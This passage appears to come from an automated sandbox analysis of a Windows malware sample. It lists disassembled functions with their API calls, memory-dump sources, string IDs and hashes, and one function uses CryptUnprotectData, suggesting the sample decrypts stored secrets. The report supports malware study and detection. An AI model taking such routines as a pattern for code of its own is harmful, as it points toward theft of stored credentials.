                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: fc0530b2d18c8c0cea0082dd3006a2303e91168c7d4cca52f338b4bfe22cba5d
                        • Instruction ID: 7917a6f9286945fb294210c29e3b78f1d0ce28ee489ae1ee0caabd34d877fcd5
                        • Opcode Fuzzy Hash: fc0530b2d18c8c0cea0082dd3006a2303e91168c7d4cca52f338b4bfe22cba5d
                        • Instruction Fuzzy Hash: 35110A70260205AFDB00CF64D888FAB37A9AF8A710F10D458F9198B250DB75E861DB66
                        Function 00277A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00E2E190,00000000,?,00280E10,00000000,?,00000000,00000000), ref: 00277A63
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00277A6A
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00E2E190,00000000,?,00280E10,00000000,?,00000000,00000000,?), ref: 00277A7D
                        • wsprintfA.USER32 ref: 00277AB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 3317088062-0
                        • Opcode ID: 5f6300ee7c6a3cf92880d40bc890a3ae49dc672f30e8b2b7cf8529f28934f28e
                        • Instruction ID: bbdea9b1f393902f275b7ee409620fb1788f0a1dbf4261e0e37ead8cdb576521
                        • Opcode Fuzzy Hash: 5f6300ee7c6a3cf92880d40bc890a3ae49dc672f30e8b2b7cf8529f28934f28e
                        • Instruction Fuzzy Hash: AB1182B1945218DBEB209F54DC45F59BB78FB05711F1047E9E90A932C0C7745E54CF51
                        Function 0062BE93 Relevance: 6.0, Strings: 4, Instructions: 1033COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 1w}{$>j_O$[C[z$pz}
                        • API String ID: 0-3808748184
                        • Opcode ID: 8ea0f9d8e95f3a0cd249f947c710c03d6008c08c378747905c083be7311afa5f
                        • Instruction ID: 2eaf806318ad7b9dce78148f8f16e4efcc9d9e8e82972a48138770be6ee080e9
                        • Opcode Fuzzy Hash: 8ea0f9d8e95f3a0cd249f947c710c03d6008c08c378747905c083be7311afa5f
                        • Instruction Fuzzy Hash: C062F5F360C2009FE7046E29EC8577ABBE9EB94360F1A493DEAC4C7744E63598448797
                        Function 00627006 Relevance: 5.8, Strings: 4, Instructions: 789COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 3<1=$@~os$fJw,$F_[
                        • API String ID: 0-3974770112
                        • Opcode ID: 6dd515b07099520e489b37115df7bd78082c5434fa1ae9b440891d7d7c880176
                        • Instruction ID: d948ccb6cf25bb10165879d805bdd2736f15e9c65945ee9a3ab09c46231af366
                        • Opcode Fuzzy Hash: 6dd515b07099520e489b37115df7bd78082c5434fa1ae9b440891d7d7c880176
                        • Instruction Fuzzy Hash: 763228F360C204AFE3086E2DEC4567ABBE9EF94720F1A493DE6C5C7744E63598018693
                        Function 00624B29 Relevance: 5.4, Strings: 3, Instructions: 1666COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: G#_=$e#Q}$'jo
                        • API String ID: 0-2241741446
                        • Opcode ID: c6ce3a9c2121fe49c100aa13d25936595ab8b44cc146024e26cd90d62ce5ff14
                        • Instruction ID: d07770289d98950de8eb6d5400e043397f8668cea0ea8a8d4ae869426e24e9ef
                        • Opcode Fuzzy Hash: c6ce3a9c2121fe49c100aa13d25936595ab8b44cc146024e26cd90d62ce5ff14
                        • Instruction Fuzzy Hash: 1AB206F3A0C2109FE304AE2DEC8567ABBE9EF94320F1A453DEAC5C7744E53598058697
                        Function 00273720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                        Download Yara Rule
                        APIs
                        • CoCreateInstance.COMBASE(0027E118,00000000,00000001,0027E108,00000000), ref: 00273758
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 002737B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID:
                        • API String ID: 123533781-0
                        • Opcode ID: 9649e5651ef631b6ee48742bf8c96c166033b296021c3333fab16490f8a382db
                        • Instruction ID: fdbccffd5cd89a128e19f91bdc1e9867e8111ef9e52935e7e0bab9455f69b8cc
                        • Opcode Fuzzy Hash: 9649e5651ef631b6ee48742bf8c96c166033b296021c3333fab16490f8a382db
                        • Instruction Fuzzy Hash: CF410A70A50A289FDB24DB58CC95B9BB7B5BB48702F4081D8E60CEB2D0D771AE85CF51
                        Function 00269B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00269B84
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00269BA3
                        • LocalFree.KERNEL32(?), ref: 00269BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: d9a205a111ff97c5ab12e79e781120bfd21b8e72e559a1dc525d0eaee7525de9
                        • Instruction ID: c195ed319fa333491e8a0acfbb4b5dde21be21c79cdb5684b70484fa44c846e7
                        • Opcode Fuzzy Hash: d9a205a111ff97c5ab12e79e781120bfd21b8e72e559a1dc525d0eaee7525de9
                        • Instruction Fuzzy Hash: FE110CB8A00209DFDB04DF94D985AAE77B9FF89304F104568E81597350D774AE51CFA1
                        Function 00628236 Relevance: 4.0, Strings: 2, Instructions: 1520COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 13~$q{[
                        • API String ID: 0-4278803760
                        • Opcode ID: 987ccd37ec5f5cd31e1089373af7747760d1e51c3d74030cb6fd63177738fefe
                        • Instruction ID: 007c06b99e4154358ec3979b15dc29c339fdf5906daa88a9f588c2b62abbec0a
                        • Opcode Fuzzy Hash: 987ccd37ec5f5cd31e1089373af7747760d1e51c3d74030cb6fd63177738fefe
                        • Instruction Fuzzy Hash: 82A207F36082049FE3046E2DEC8567ABBE9EF94720F1A493DEAC4C3744E63598458797
                        Function 0061C66C Relevance: 4.0, Strings: 2, Instructions: 1478COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: J?g$Qn[r
                        • API String ID: 0-2505242624
                        • Opcode ID: 2c15854772ac367f9fa96b77186baf03b93a3ef17004cadbb9c896a1e861b313
                        • Instruction ID: 7fcd5024f98d2a1ee866b7e57f366832b1a96f6dabdc7cf0b05eedd46fb627a9
                        • Opcode Fuzzy Hash: 2c15854772ac367f9fa96b77186baf03b93a3ef17004cadbb9c896a1e861b313
                        • Instruction Fuzzy Hash: 21A2E4F3A0C2049FE304AF29EC8567AFBE5EF94720F16492DE6C483744EA3558458B97
                        Function 004E369F Relevance: 2.7, Strings: 2, Instructions: 240COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 9r^N$9r^N
                        • API String ID: 0-2535297952
                        • Opcode ID: b28868d0d3bd75243417bdfd282aadb14c6e333e452d9f163ac98efcbfc5bf15
                        • Instruction ID: aa2b012dee8fc61583bf0ccdfa9cb761cbb4634a5360346c797a3f82d4c3098d
                        • Opcode Fuzzy Hash: b28868d0d3bd75243417bdfd282aadb14c6e333e452d9f163ac98efcbfc5bf15
                        • Instruction Fuzzy Hash: 33713BF3A092045FE3046E2DEC4473BFBDADBD4324F26863DDA8487784ED7A58158686
                        Function 0072D2F2 Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 4u9:
                        • API String ID: 0-3300871769
                        • Opcode ID: 5c51cce1e74bf0626f22f97a2c24bbadac2cc50a172bb5037479ba92bb2ac714
                        • Instruction ID: c6f746c0ea25265363523ade190db7cf9b2c96cb0ab454342a88827ea5f0c4a3
                        • Opcode Fuzzy Hash: 5c51cce1e74bf0626f22f97a2c24bbadac2cc50a172bb5037479ba92bb2ac714
                        • Instruction Fuzzy Hash: 0951EFB260C314DFC320BE69E84453EB7E4EF90710F26882DE6C687615E2795D81EB53
                        Function 005C5F47 Relevance: .2, Instructions: 212COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4779aaf29a2a67dbf85f539d243007edd3bcab67584fbef789ba48e55db114c1
                        • Instruction ID: a940c4b1c815707bb7427c240e4c4bce92b3f5a46fc0d8193bad86e3828eb389
                        • Opcode Fuzzy Hash: 4779aaf29a2a67dbf85f539d243007edd3bcab67584fbef789ba48e55db114c1
                        • Instruction Fuzzy Hash: DD61F3B3A0C7149FE309AE29DC8576AF7E6EFC4320F17893DD6C487744EA3548418A96
                        Function 00607A90 Relevance: .2, Instructions: 188COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
